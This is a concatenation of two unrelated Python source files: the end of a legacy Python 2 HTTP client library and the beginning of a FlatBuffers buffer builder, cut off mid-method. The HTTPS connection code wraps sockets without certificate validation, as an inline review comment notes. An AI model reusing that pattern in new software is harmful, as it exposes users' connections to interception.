            self._tunnel()

    def close(self):
        """Close the connection to the HTTP server."""
        if self.sock:
            self.sock.close()   # close it manually... there may be other refs
            self.sock = None
        if self.__response:
            self.__response.close()
            self.__response = None
        self.__state = _CS_IDLE

    def send(self, str):
        """Send `str' to the server."""
        if self.sock is None:
            if self.auto_open:
                self.connect()
            else:
                raise NotConnected()

        # send the data to the server. if we get a broken pipe, then close
        # the socket. we want to reconnect when somebody tries to send again.
        #
        # NOTE: we DO propagate the error, though, because we cannot simply
        #       ignore the error... the caller will know if they can retry.
        if self.debuglevel > 0:
            print "send:", repr(str)
        try:
            blocksize=8192
            # file-like bodies are streamed in blocks; arrays are sent
            # whole because they expose read() but are not file-like here
            if hasattr(str,'read') and not isinstance(str, array):
                if self.debuglevel > 0: print "sendIng a read()able"
                data=str.read(blocksize)
                while data:
                    self.sock.sendall(data)
                    data=str.read(blocksize)
            else:
                self.sock.sendall(str)
        except socket.error, v:
            if v.args[0] == 32:      # Broken pipe
                self.close()
            raise

    def _output(self, s):
        """Add a line of output to the current request buffer.

        Assumes that the line does *not* end with \\r\\n.
        """
        self._buffer.append(s)

    def _send_output(self):
        """Send the currently buffered request and clear the buffer.

        Appends an extra \\r\\n to the buffer.
        """
        self._buffer.extend(("", ""))
        msg = "\r\n".join(self._buffer)
        del self._buffer[:]
        self.send(msg)

    def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
        """Send a request to the server.

        `method' specifies an HTTP request method, e.g. 'GET'.
        `url' specifies the object being requested, e.g. '/index.html'.
        `skip_host' if True does not add automatically a 'Host:' header
        `skip_accept_encoding' if True does not add automatically an
           'Accept-Encoding:' header
        """

        # if a prior response has been completed, then forget about it.
        if self.__response and self.__response.isclosed():
            self.__response = None


        # in certain cases, we cannot issue another request on this connection.
        # this occurs when:
        #   1) we are in the process of sending a request.   (_CS_REQ_STARTED)
        #   2) a response to a previous request has signalled that it is going
        #      to close the connection upon completion.
        #   3) the headers for the previous response have not been read, thus
        #      we cannot determine whether point (2) is true.   (_CS_REQ_SENT)
        #
        # if there is no prior response, then we can request at will.
        #
        # if point (2) is true, then we will have passed the socket to the
        # response (effectively meaning, "there is no prior response"), and
        # will open a new one when a new request is made.
        #
        # Note: if a prior response exists, then we *can* start a new request.
        #       We are not allowed to begin fetching the response to this new
        #       request, however, until that prior response is complete.
        #
        if self.__state == _CS_IDLE:
            self.__state = _CS_REQ_STARTED
        else:
            raise CannotSendRequest()

        # Save the method we use, we need it later in the response phase
        self._method = method
        if not url:
            url = '/'
        str = '%s %s %s' % (method, url, self._http_vsn_str)

        self._output(str)

        if self._http_vsn == 11:
            # Issue some standard headers for better HTTP/1.1 compliance

            if not skip_host:
                # this header is issued *only* for HTTP/1.1
                # connections. more specifically, this means it is
                # only issued when the client uses the new
                # HTTPConnection() class. backwards-compat clients
                # will be using HTTP/1.0 and those clients may be
                # issuing this header themselves. we should NOT issue
                # it twice; some web servers (such as Apache) barf
                # when they see two Host: headers

                # If we need a non-standard port,include it in the
                # header.  If the request is going through a proxy,
                # but the host of the actual URL, not the host of the
                # proxy.

                netloc = ''
                if url.startswith('http'):
                    nil, netloc, nil, nil, nil = urlsplit(url)

                if netloc:
                    try:
                        netloc_enc = netloc.encode("ascii")
                    except UnicodeEncodeError:
                        netloc_enc = netloc.encode("idna")
                    self.putheader('Host', netloc_enc)
                else:
                    try:
                        host_enc = self.host.encode("ascii")
                    except UnicodeEncodeError:
                        host_enc = self.host.encode("idna")
                    if self.port == self.default_port:
                        self.putheader('Host', host_enc)
                    else:
                        self.putheader('Host', "%s:%s" % (host_enc, self.port))

            # note: we are assuming that clients will not attempt to set these
            #       headers since *this* library must deal with the
            #       consequences. this also means that when the supporting
            #       libraries are updated to recognize other forms, then this
            #       code should be changed (removed or updated).

            # we only want a Content-Encoding of "identity" since we don't
            # support encodings such as x-gzip or x-deflate.
            if not skip_accept_encoding:
                self.putheader('Accept-Encoding', 'identity')

            # we can accept "chunked" Transfer-Encodings, but no others
            # NOTE: no TE header implies *only* "chunked"
            #self.putheader('TE', 'chunked')

            # if TE is supplied in the header, then it must appear in a
            # Connection header.
            #self.putheader('Connection', 'TE')

        else:
            # For HTTP/1.0, the server will assume "not chunked"
            pass

    def putheader(self, header, value):
        """Send a request header line to the server.

        For example: h.putheader('Accept', 'text/html')
        """
        if self.__state != _CS_REQ_STARTED:
            raise CannotSendHeader()

        str = '%s: %s' % (header, value)
        self._output(str)

    def endheaders(self):
        """Indicate that the last header line has been sent to the server."""

        if self.__state == _CS_REQ_STARTED:
            self.__state = _CS_REQ_SENT
        else:
            raise CannotSendHeader()

        self._send_output()

    def request(self, method, url, body=None, headers={}):
        """Send a complete request to the server."""
        # NOTE(review): the mutable default for `headers' is only read,
        # never mutated, so it is harmless -- but callers should not
        # rely on it being a fresh dict.

        try:
            self._send_request(method, url, body, headers)
        except socket.error, v:
            # trap 'Broken pipe' if we're allowed to automatically reconnect
            if v.args[0] != 32 or not self.auto_open:
                raise
            # try one more time
            self._send_request(method, url, body, headers)

    def _send_request(self, method, url, body, headers):
        """Emit request line, headers (adding Content-Length for a body
        when the caller did not supply one), and the body itself."""
        # honour explicitly requested Host: and Accept-Encoding headers
        header_names = dict.fromkeys([k.lower() for k in headers])
        skips = {}
        if 'host' in header_names:
            skips['skip_host'] = 1
        if 'accept-encoding' in header_names:
            skips['skip_accept_encoding'] = 1

        self.putrequest(method, url, **skips)

        if body and ('content-length' not in header_names):
            thelen=None
            try:
                thelen=str(len(body))
            except TypeError, te:
                # If this is a file-like object, try to
                # fstat its file descriptor
                import os
                try:
                    thelen = str(os.fstat(body.fileno()).st_size)
                except (AttributeError, OSError):
                    # Don't send a length if this failed
                    if self.debuglevel > 0: print "Cannot stat!!"

            if thelen is not None:
                self.putheader('Content-Length',thelen)
        for hdr, value in headers.iteritems():
            self.putheader(hdr, value)
        self.endheaders()

        if body:
            self.send(body)

    def getresponse(self):
        "Get the response from the server."

        # if a prior response has been completed, then forget about it.
        if self.__response and self.__response.isclosed():
            self.__response = None

        #
        # if a prior response exists, then it must be completed (otherwise, we
        # cannot read this response's header to determine the connection-close
        # behavior)
        #
        # note: if a prior response existed, but was connection-close, then the
        # socket and response were made independent of this HTTPConnection
        # object since a new request requires that we open a whole new
        # connection
        #
        # this means the prior response had one of two states:
        #   1) will_close: this connection was reset and the prior socket and
        #                  response operate independently
        #   2) persistent: the response was retained and we await its
        #                  isclosed() status to become true.
        #
        if self.__state != _CS_REQ_SENT or self.__response:
            raise ResponseNotReady()

        if self.debuglevel > 0:
            response = self.response_class(self.sock, self.debuglevel,
                                           strict=self.strict,
                                           method=self._method)
        else:
            response = self.response_class(self.sock, strict=self.strict,
                                           method=self._method)

        response.begin()
        assert response.will_close != _UNKNOWN
        self.__state = _CS_IDLE

        if response.will_close:
            # this effectively passes the connection to the response
            self.close()
        else:
            # remember this, so we can tell when it is complete
            self.__response = response

        return response
class HTTP:
    "Compatibility class with httplib.py from 1.5."

    _http_vsn = 10
    _http_vsn_str = 'HTTP/1.0'

    debuglevel = 0

    _connection_class = HTTPConnection

    def __init__(self, host='', port=None, strict=None):
        "Provide a default host, since the superclass requires one."

        # some joker passed 0 explicitly, meaning default port
        if port == 0:
            port = None

        # Note that we may pass an empty string as the host; this will throw
        # an error when we attempt to connect. Presumably, the client code
        # will call connect before then, with a proper host.
        self._setup(self._connection_class(host, port, strict))

    def _setup(self, conn):
        """Wrap `conn' and delegate most of the old interface to it."""
        self._conn = conn

        # set up delegation to flesh out interface
        self.send = conn.send
        self.putrequest = conn.putrequest
        self.endheaders = conn.endheaders
        self.set_debuglevel = conn.set_debuglevel

        conn._http_vsn = self._http_vsn
        conn._http_vsn_str = self._http_vsn_str

        self.file = None

    def connect(self, host=None, port=None):
        "Accept arguments to set the host/port, since the superclass doesn't."

        if host is not None:
            self._conn._set_hostport(host, port)
        self._conn.connect()

    def getfile(self):
        "Provide a getfile, since the superclass' does not use this concept."
        return self.file

    def putheader(self, header, *values):
        "The superclass allows only one value argument."
        self._conn.putheader(header, '\r\n\t'.join(values))

    def getreply(self):
        """Compat definition since superclass does not define it.

        Returns a tuple consisting of:
        - server status code (e.g. '200' if all goes well)
        - server "reason" corresponding to status code
        - any RFC822 headers in the response from the server
        """
        try:
            response = self._conn.getresponse()
        except BadStatusLine, e:
            ### hmm. if getresponse() ever closes the socket on a bad request,
            ### then we are going to have problems with self.sock

            ### should we keep this behavior? do people use it?
            # keep the socket open (as a file), and return it
            self.file = self._conn.sock.makefile('rb', 0)

            # close our socket -- we want to restart after any protocol error
            self.close()

            self.headers = None
            return -1, e.line, None
        self.headers = response.msg
        self.file = response.fp
        return response.status, response.reason, response.msg

    def close(self):
        self._conn.close()

        # note that self.file == response.fp, which gets closed by the
        # superclass. just clear the object ref here.
        ### hmm. messy. if status==-1, then self.file is owned by us.
        ### well... we aren't explicitly closing, but losing this ref will
        ###   do it
        self.file = None
# SSL support is optional: these names only exist when the ssl module
# is available in this build of Python.
try:
    import ssl
except ImportError:
    pass
else:
    class HTTPSConnection(HTTPConnection):
        "This class allows communication via SSL."

        default_port = HTTPS_PORT

        def __init__(self, host, port=None, key_file=None, cert_file=None,
                     strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
            HTTPConnection.__init__(self, host, port, strict, timeout)
            self.key_file = key_file
            self.cert_file = cert_file

        def connect(self):
            "Connect to a host on a given (SSL) port."

            sock = socket.create_connection((self.host, self.port), self.timeout)
            if self._tunnel_host:
                # tunnel over the plain socket first, then wrap it
                self.sock = sock
                self._tunnel()
            # NOTE(review): wrap_socket is called without cert_reqs, so no
            # server certificate validation is performed here -- confirm
            # this is acceptable for callers.
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)

    __all__.append("HTTPSConnection")

    class HTTPS(HTTP):
        """Compatibility with 1.5 httplib interface

        Python 1.5.2 did not have an HTTPS class, but it defined an
        interface for sending http requests that is also useful for
        https.
        """

        _connection_class = HTTPSConnection

        def __init__(self, host='', port=None, key_file=None, cert_file=None,
                     strict=None):
            # provide a default host, pass the X509 cert info

            # urf. compensate for bad input.
            if port == 0:
                port = None
            self._setup(self._connection_class(host, port, key_file,
                                               cert_file, strict))

            # we never actually use these for anything, but we keep them
            # here for compatibility with post-1.5.2 CVS.
            self.key_file = key_file
            self.cert_file = cert_file

    def FakeSocket (sock, sslobj):
        warnings.warn("FakeSocket is deprecated, and won't be in 3.x. " +
                      "Use the result of ssl.wrap_socket() directly instead.",
                      DeprecationWarning, stacklevel=2)
        return sslobj
class HTTPException(Exception):
    """Base class for all exceptions raised by this module."""
    # Subclasses that define an __init__ must call Exception.__init__
    # or define self.args.  Otherwise, str() will fail.
    pass
class NotConnected(HTTPException):
    """Raised by send() when there is no socket and auto_open is off."""
    pass
class InvalidURL(HTTPException):
    """Raised by _set_hostport() when the port in a host string is not numeric."""
    pass
class UnknownProtocol(HTTPException):
    """Raised by HTTPResponse.begin() for an unrecognized HTTP version.

    The offending version string is kept on `self.version'.
    """
    def __init__(self, version):
        self.args = version,
        self.version = version
class UnknownTransferEncoding(HTTPException):
    """Part of the public API; not raised anywhere in this module itself."""
    pass
class UnimplementedFileMode(HTTPException):
    """Part of the public API; not raised anywhere in this module itself."""
    pass
class IncompleteRead(HTTPException):
    """Raised when fewer body bytes arrive than the protocol promised.

    `partial' holds the bytes that were read before the stream ended;
    `expected', when known, is how many more bytes were still owed.
    """

    def __init__(self, partial, expected=None):
        self.args = partial,
        self.partial = partial
        self.expected = expected

    def __repr__(self):
        suffix = ''
        if self.expected is not None:
            suffix = ', %i more expected' % self.expected
        return 'IncompleteRead(%i bytes read%s)' % (len(self.partial), suffix)

    def __str__(self):
        return repr(self)
class ImproperConnectionState(HTTPException):
    """Base class for state-machine violations on an HTTPConnection."""
    pass
class CannotSendRequest(ImproperConnectionState):
    """Raised by putrequest() when the connection is not in the Idle state."""
    pass
class CannotSendHeader(ImproperConnectionState):
    """Raised by putheader()/endheaders() outside the Request-started state."""
    pass
class ResponseNotReady(ImproperConnectionState):
    """Raised when a response (or its headers) is requested prematurely."""
    pass
class BadStatusLine(HTTPException):
    """Raised when the server sends an unparsable HTTP status line.

    The offending line is kept on `self.line' for inspection.
    """
    def __init__(self, line):
        self.args = line,
        self.line = line
# for backwards compatibility: older code catches `httplib.error' rather
# than the HTTPException hierarchy.
error = HTTPException
class LineAndFileWrapper:
    """A limited file-like object for HTTP/0.9 responses.

    The status-line parser consumes a readline() that, for an HTTP/0.9
    server, is really the first line of the body.  That line is stashed
    here and replayed ahead of the remaining data from the real file,
    so clients see one seamless readable object.
    """

    def __init__(self, line, file):
        self._line = line
        self._file = file
        self._line_consumed = 0
        self._line_offset = 0
        self._line_left = len(line)

    def __getattr__(self, attr):
        # Anything not implemented here is delegated to the real file.
        return getattr(self._file, attr)

    def _done(self):
        # The buffered line is exhausted.  Rebind the read methods
        # straight to the underlying file so future calls skip the
        # buffering logic entirely.
        self._line_consumed = 1
        self.read = self._file.read
        self.readline = self._file.readline
        self.readlines = self._file.readlines

    def read(self, amt=None):
        if self._line_consumed:
            return self._file.read(amt)
        assert self._line_left
        if amt is not None and amt <= self._line_left:
            # The request is satisfied entirely from the buffered line.
            start = self._line_offset
            end = start + amt
            piece = self._line[start:end]
            self._line_offset = end
            self._line_left -= amt
            if self._line_left == 0:
                self._done()
            return piece
        # Unbounded read, or one that spills past the buffered line:
        # drain the line, then continue from the real file.
        head = self._line[self._line_offset:]
        self._done()
        if amt is None:
            return head + self._file.read()
        return head + self._file.read(amt - len(head))

    def readline(self):
        if self._line_consumed:
            return self._file.readline()
        assert self._line_left
        head = self._line[self._line_offset:]
        self._done()
        return head

    def readlines(self, size=None):
        if self._line_consumed:
            return self._file.readlines(size)
        assert self._line_left
        result = [self._line[self._line_offset:]]
        self._done()
        if size is None:
            return result + self._file.readlines()
        return result + self._file.readlines(size)
def test():
    """Test this module.

    A hodge podge of tests collected here, because they have too many
    external dependencies for the regular test suite.

    Network I/O only: fetches real pages and prints status/headers, so
    there are no assertions and no computable result.
    """

    import sys
    import getopt
    opts, args = getopt.getopt(sys.argv[1:], 'd')
    dl = 0
    for o, a in opts:
        if o == '-d': dl = dl + 1
    host = 'www.python.org'
    selector = '/'
    if args[0:]: host = args[0]
    if args[1:]: selector = args[1]
    h = HTTP()
    h.set_debuglevel(dl)
    h.connect(host)
    h.putrequest('GET', selector)
    h.endheaders()
    status, reason, headers = h.getreply()
    print 'status =', status
    print 'reason =', reason
    print "read", len(h.getfile().read())
    print
    if headers:
        for header in headers.headers: print header.strip()
    print

    # minimal test that code to extract host from url works
    class HTTP11(HTTP):
        _http_vsn = 11
        _http_vsn_str = 'HTTP/1.1'

    h = HTTP11('www.python.org')
    h.putrequest('GET', 'http://www.python.org/~jeremy/')
    h.endheaders()
    h.getreply()
    h.close()

    # only exercise HTTPS when the ssl module is available
    try:
        import ssl
    except ImportError:
        pass
    else:
        for host, selector in (('sourceforge.net', '/projects/python'),
                               ):
            print "https://%s%s" % (host, selector)
            hs = HTTPS()
            hs.set_debuglevel(dl)
            hs.connect(host)
            hs.putrequest('GET', selector)
            hs.endheaders()
            status, reason, headers = hs.getreply()
            print 'status =', status
            print 'reason =', reason
            print "read", len(hs.getfile().read())
            print
            if headers:
                for header in headers.headers: print header.strip()
            print

if __name__ == '__main__':
    test()
| |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import number_types as N
from .number_types import (UOffsetTFlags, SOffsetTFlags, VOffsetTFlags)
from . import encode
from . import packer
from . import compat
from .compat import range_func
from .compat import memoryview_type
## @file
## @addtogroup flatbuffers_python_api
## @{
## @cond FLATBUFFERS_INTERNAL
class OffsetArithmeticError(RuntimeError):
    """
    Raised when offset arithmetic produces an impossible value, which
    usually means fields were written incorrectly. Under normal use
    this situation is considered unreachable.
    """
    pass
class IsNotNestedError(RuntimeError):
    """
    Raised when Object data is written through a Builder while no
    Object is currently being built.
    """
    pass
class IsNestedError(RuntimeError):
    """
    Raised when a Builder begins a new Object while another Object is
    still being built.
    """
    pass
class StructIsNotInlineError(RuntimeError):
    """
    Raised when a Builder writes a Struct at a location other than the
    current Offset (structs must be stored inline).
    """
    pass
class BuilderSizeError(RuntimeError):
    """
    Raised when a Builder would exceed the hardcoded buffer limit of
    2 gigabytes.
    """
    pass
class BuilderNotFinishedError(RuntimeError):
    """
    Raised when `Output` is called before `Finish`.
    """
    pass
# VtableMetadataFields is the count of metadata fields in each vtable:
# the vtable byte size and the object byte size (see WriteVtable).
VtableMetadataFields = 2
## @endcond
class Builder(object):
    """ A Builder is used to construct one or more FlatBuffers.
    Typically, Builder objects will be used from code generated by the `flatc`
    compiler.
    A Builder constructs byte buffers in a last-first manner for simplicity and
    performance during reading.
    Internally, a Builder is a state machine for creating FlatBuffer objects.
    It holds the following internal state:
        - Bytes: an array of bytes.
        - current_vtable: a list of integers.
        - vtables: a list of vtable entries (i.e. a list of list of integers).
    Attributes:
      Bytes: The internal `bytearray` for the Builder.
      finished: A boolean determining if the Builder has been finalized.
    """
    ## @cond FLATBUFFERS_INTERNAL
    __slots__ = ("Bytes", "current_vtable", "head", "minalign", "objectEnd",
                 "vtables", "nested", "finished")
    """Maximum buffer size constant, in bytes.
    Builder will never allow its buffer to grow over this size.
    Currently equals 2Gb.
    """
    MAX_BUFFER_SIZE = 2**31
    ## @endcond
    def __init__(self, initialSize):
        """Initializes a Builder of size `initial_size`.
        The internal buffer is grown as needed.
        """
        if not (0 <= initialSize <= Builder.MAX_BUFFER_SIZE):
            msg = "flatbuffers: Cannot create Builder larger than 2 gigabytes."
            raise BuilderSizeError(msg)
        self.Bytes = bytearray(initialSize)
        ## @cond FLATBUFFERS_INTERNAL
        self.current_vtable = None
        self.head = UOffsetTFlags.py_type(initialSize)
        self.minalign = 1
        self.objectEnd = None
        self.vtables = []
        self.nested = False
        ## @endcond
        self.finished = False
    def Output(self):
        """Return the portion of the buffer that has been used for writing data.
        This is the typical way to access the FlatBuffer data inside the
        builder. If you try to access `Builder.Bytes` directly, you would need
        to manually index it with `Head()`, since the buffer is constructed
        backwards.
        It raises BuilderNotFinishedError if the buffer has not been finished
        with `Finish`.
        """
        if not self.finished:
            raise BuilderNotFinishedError()
        return self.Bytes[self.Head():]
    ## @cond FLATBUFFERS_INTERNAL
    def StartObject(self, numfields):
        """StartObject initializes bookkeeping for writing a new object."""
        self.assertNotNested()
        # use 32-bit offsets so that arithmetic doesn't overflow.
        self.current_vtable = [0 for _ in range_func(numfields)]
        self.objectEnd = self.Offset()
        self.minalign = 1
        self.nested = True
    def WriteVtable(self):
        """
        WriteVtable serializes the vtable for the current object, if needed.
        Before writing out the vtable, this checks pre-existing vtables for
        equality to this one. If an equal vtable is found, point the object to
        the existing vtable and return.
        Because vtable values are sensitive to alignment of object data, not
        all logically-equal vtables will be deduplicated.
        A vtable has the following format:
          <VOffsetT: size of the vtable in bytes, including this value>
          <VOffsetT: size of the object in bytes, including the vtable offset>
          <VOffsetT: offset for a field> * N, where N is the number of fields
           in the schema for this type. Includes deprecated fields.
        Thus, a vtable is made of 2 + N elements, each VOffsetT bytes wide.
        An object has the following format:
          <SOffsetT: offset to this object's vtable (may be negative)>
          <byte: data>+
        """
        # Prepend a zero scalar to the object. Later in this function we'll
        # write an offset here that points to the object's vtable:
        self.PrependSOffsetTRelative(0)
        objectOffset = self.Offset()
        existingVtable = None
        # Trim trailing 0 offsets.
        while self.current_vtable and self.current_vtable[-1] == 0:
            self.current_vtable.pop()
        # Search backwards through existing vtables, because similar vtables
        # are likely to have been recently appended. See
        # BenchmarkVtableDeduplication for a case in which this heuristic
        # saves about 30% of the time used in writing objects with duplicate
        # tables.
        i = len(self.vtables) - 1
        while i >= 0:
            # Find the other vtable, which is associated with `i`:
            vt2Offset = self.vtables[i]
            vt2Start = len(self.Bytes) - vt2Offset
            vt2Len = encode.Get(packer.voffset, self.Bytes, vt2Start)
            metadata = VtableMetadataFields * N.VOffsetTFlags.bytewidth
            vt2End = vt2Start + vt2Len
            vt2 = self.Bytes[vt2Start+metadata:vt2End]
            # Compare the other vtable to the one under consideration.
            # If they are equal, store the offset and break:
            if vtableEqual(self.current_vtable, objectOffset, vt2):
                existingVtable = vt2Offset
                break
            i -= 1
        if existingVtable is None:
            # Did not find a vtable, so write this one to the buffer.
            # Write out the current vtable in reverse, because
            # serialization occurs in last-first order:
            i = len(self.current_vtable) - 1
            while i >= 0:
                off = 0
                if self.current_vtable[i] != 0:
                    # Forward reference to field;
                    # use 32bit number to ensure no overflow:
                    off = objectOffset - self.current_vtable[i]
                self.PrependVOffsetT(off)
                i -= 1
            # The two metadata fields are written last.
            # First, store the object bytesize:
            objectSize = UOffsetTFlags.py_type(objectOffset - self.objectEnd)
            self.PrependVOffsetT(VOffsetTFlags.py_type(objectSize))
            # Second, store the vtable bytesize:
            vBytes = len(self.current_vtable) + VtableMetadataFields
            vBytes *= N.VOffsetTFlags.bytewidth
            self.PrependVOffsetT(VOffsetTFlags.py_type(vBytes))
            # Next, write the offset to the new vtable in the
            # already-allocated SOffsetT at the beginning of this object:
            objectStart = SOffsetTFlags.py_type(len(self.Bytes) - objectOffset)
            encode.Write(packer.soffset, self.Bytes, objectStart,
                         SOffsetTFlags.py_type(self.Offset() - objectOffset))
            # Finally, store this vtable in memory for future
            # deduplication:
            self.vtables.append(self.Offset())
        else:
            # Found a duplicate vtable.
            objectStart = SOffsetTFlags.py_type(len(self.Bytes) - objectOffset)
            self.head = UOffsetTFlags.py_type(objectStart)
            # Write the offset to the found vtable in the
            # already-allocated SOffsetT at the beginning of this object:
            encode.Write(packer.soffset, self.Bytes, self.Head(),
                         SOffsetTFlags.py_type(existingVtable - objectOffset))
        self.current_vtable = None
        return objectOffset
    def EndObject(self):
        """EndObject writes data necessary to finish object construction."""
        self.assertNested()
        self.nested = False
        return self.WriteVtable()
    def growByteBuffer(self):
        """Doubles the size of the byteslice, and copies the old data towards
        the end of the new buffer (since we build the buffer backwards)."""
        if len(self.Bytes) == Builder.MAX_BUFFER_SIZE:
            msg = "flatbuffers: cannot grow buffer beyond 2 gigabytes"
            raise BuilderSizeError(msg)
        newSize = min(len(self.Bytes) * 2, Builder.MAX_BUFFER_SIZE)
        if newSize == 0:
            newSize = 1
        bytes2 = bytearray(newSize)
        bytes2[newSize-len(self.Bytes):] = self.Bytes
        self.Bytes = bytes2
    ## @endcond
    def Head(self):
        """Get the start of useful data in the underlying byte buffer.
        Note: unlike other functions, this value is interpreted as from the
        left.
        """
        ## @cond FLATBUFFERS_INTERNAL
        return self.head
        ## @endcond
    ## @cond FLATBUFFERS_INTERNAL
    def Offset(self):
        """Offset relative to the end of the buffer."""
        return UOffsetTFlags.py_type(len(self.Bytes) - self.Head())
    def Pad(self, n):
        """Pad places zeros at the current offset."""
        for i in range_func(n):
            self.Place(0, N.Uint8Flags)
    def Prep(self, size, additionalBytes):
        """
        Prep prepares to write an element of `size` after `additional_bytes`
        have been written, e.g. if you write a string, you need to align
        such the int length field is aligned to SizeInt32, and the string
        data follows it directly.
        If all you need to do is align, `additionalBytes` will be 0.
        """
        # Track the biggest thing we've ever aligned to.
        if size > self.minalign:
            self.minalign = size
        # Find the amount of alignment needed such that `size` is properly
        # aligned after `additionalBytes`:
        alignSize = (~(len(self.Bytes) - self.Head() + additionalBytes)) + 1
        alignSize &= (size - 1)
        # Reallocate the buffer if needed:
        while self.Head() < alignSize+size+additionalBytes:
            oldBufSize = len(self.Bytes)
            self.growByteBuffer()
            # The data was copied toward the end of the grown buffer, so
            # shift `head` right by the amount of growth.
            updated_head = self.head + len(self.Bytes) - oldBufSize
            self.head = UOffsetTFlags.py_type(updated_head)
        self.Pad(alignSize)
    def PrependSOffsetTRelative(self, off):
        """
        PrependSOffsetTRelative prepends an SOffsetT, relative to where it
        will be written.
        """
        # Ensure alignment is already done:
        self.Prep(N.SOffsetTFlags.bytewidth, 0)
        if not (off <= self.Offset()):
            msg = "flatbuffers: Offset arithmetic error."
            raise OffsetArithmeticError(msg)
        off2 = self.Offset() - off + N.SOffsetTFlags.bytewidth
        self.PlaceSOffsetT(off2)
    ## @endcond
    def PrependUOffsetTRelative(self, off):
        """Prepends an unsigned offset into vector data, relative to where it
        will be written.
        """
        # Ensure alignment is already done:
        self.Prep(N.UOffsetTFlags.bytewidth, 0)
        if not (off <= self.Offset()):
            msg = "flatbuffers: Offset arithmetic error."
            raise OffsetArithmeticError(msg)
        off2 = self.Offset() - off + N.UOffsetTFlags.bytewidth
        self.PlaceUOffsetT(off2)
    ## @cond FLATBUFFERS_INTERNAL
    def StartVector(self, elemSize, numElems, alignment):
        """
        StartVector initializes bookkeeping for writing a new vector.
        A vector has the following format:
          - <UOffsetT: number of elements in this vector>
          - <T: data>+, where T is the type of elements of this vector.
        """
        self.assertNotNested()
        self.nested = True
        self.Prep(N.Uint32Flags.bytewidth, elemSize*numElems)
        self.Prep(alignment, elemSize*numElems)  # In case alignment > int.
        return self.Offset()
    ## @endcond
    def EndVector(self, vectorNumElems):
        """EndVector writes data necessary to finish vector construction."""
        self.assertNested()
        ## @cond FLATBUFFERS_INTERNAL
        self.nested = False
        ## @endcond
        # we already made space for this, so write without PrependUint32
        self.PlaceUOffsetT(vectorNumElems)
        return self.Offset()
    def CreateString(self, s, encoding='utf-8', errors='strict'):
        """CreateString writes a null-terminated byte string as a vector."""
        self.assertNotNested()
        ## @cond FLATBUFFERS_INTERNAL
        self.nested = True
        ## @endcond
        if isinstance(s, compat.string_types):
            x = s.encode(encoding, errors)
        elif isinstance(s, compat.binary_types):
            x = s
        else:
            raise TypeError("non-string passed to CreateString")
        self.Prep(N.UOffsetTFlags.bytewidth, (len(x)+1)*N.Uint8Flags.bytewidth)
        self.Place(0, N.Uint8Flags)
        # Use the *encoded* byte length, not the character count: for
        # non-ASCII input len(s) != len(x), and reserving len(s) bytes
        # would corrupt the buffer.
        l = UOffsetTFlags.py_type(len(x))
        ## @cond FLATBUFFERS_INTERNAL
        self.head = UOffsetTFlags.py_type(self.Head() - l)
        ## @endcond
        self.Bytes[self.Head():self.Head()+l] = x
        return self.EndVector(len(x))
    ## @cond FLATBUFFERS_INTERNAL
    def assertNested(self):
        """
        Check that we are in the process of building an object.
        """
        if not self.nested:
            raise IsNotNestedError()
    def assertNotNested(self):
        """
        Check that no other objects are being built while making this
        object. If not, raise an exception.
        """
        if self.nested:
            raise IsNestedError()
    def assertStructIsInline(self, obj):
        """
        Structs are always stored inline, so need to be created right
        where they are used. You'll get this error if you created it
        elsewhere.
        """
        N.enforce_number(obj, N.UOffsetTFlags)
        if obj != self.Offset():
            msg = ("flatbuffers: Tried to write a Struct at an Offset that "
                   "is different from the current Offset of the Builder.")
            raise StructIsNotInlineError(msg)
    def Slot(self, slotnum):
        """
        Slot sets the vtable key `voffset` to the current location in the
        buffer.
        """
        self.assertNested()
        self.current_vtable[slotnum] = self.Offset()
    ## @endcond
    def Finish(self, rootTable):
        """Finish finalizes a buffer, pointing to the given `rootTable`."""
        N.enforce_number(rootTable, N.UOffsetTFlags)
        self.Prep(self.minalign, N.UOffsetTFlags.bytewidth)
        self.PrependUOffsetTRelative(rootTable)
        self.finished = True
        return self.Head()
    ## @cond FLATBUFFERS_INTERNAL
    def Prepend(self, flags, off):
        self.Prep(flags.bytewidth, 0)
        self.Place(off, flags)
    def PrependSlot(self, flags, o, x, d):
        # Write the value only when it differs from the default `d`;
        # default-valued fields are left out of the buffer entirely.
        N.enforce_number(x, flags)
        N.enforce_number(d, flags)
        if x != d:
            self.Prepend(flags, x)
            self.Slot(o)
    def PrependBoolSlot(self, *args): self.PrependSlot(N.BoolFlags, *args)
    def PrependByteSlot(self, *args): self.PrependSlot(N.Uint8Flags, *args)
    def PrependUint8Slot(self, *args): self.PrependSlot(N.Uint8Flags, *args)
    def PrependUint16Slot(self, *args): self.PrependSlot(N.Uint16Flags, *args)
    def PrependUint32Slot(self, *args): self.PrependSlot(N.Uint32Flags, *args)
    def PrependUint64Slot(self, *args): self.PrependSlot(N.Uint64Flags, *args)
    def PrependInt8Slot(self, *args): self.PrependSlot(N.Int8Flags, *args)
    def PrependInt16Slot(self, *args): self.PrependSlot(N.Int16Flags, *args)
    def PrependInt32Slot(self, *args): self.PrependSlot(N.Int32Flags, *args)
    def PrependInt64Slot(self, *args): self.PrependSlot(N.Int64Flags, *args)
    def PrependFloat32Slot(self, *args): self.PrependSlot(N.Float32Flags,
                                                          *args)
    def PrependFloat64Slot(self, *args): self.PrependSlot(N.Float64Flags,
                                                          *args)
    def PrependUOffsetTRelativeSlot(self, o, x, d):
        """
        PrependUOffsetTRelativeSlot prepends an UOffsetT onto the object at
        vtable slot `o`. If value `x` equals default `d`, then the slot will
        be set to zero and no other data will be written.
        """
        if x != d:
            self.PrependUOffsetTRelative(x)
            self.Slot(o)
    def PrependStructSlot(self, v, x, d):
        """
        PrependStructSlot prepends a struct onto the object at vtable slot `v`.
        Structs are stored inline, so nothing additional is being added.
        In generated code, `d` is always 0.
        """
        N.enforce_number(d, N.UOffsetTFlags)
        if x != d:
            self.assertStructIsInline(x)
            self.Slot(v)
    ## @endcond
    def PrependBool(self, x):
        """Prepend a `bool` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.BoolFlags, x)
    def PrependByte(self, x):
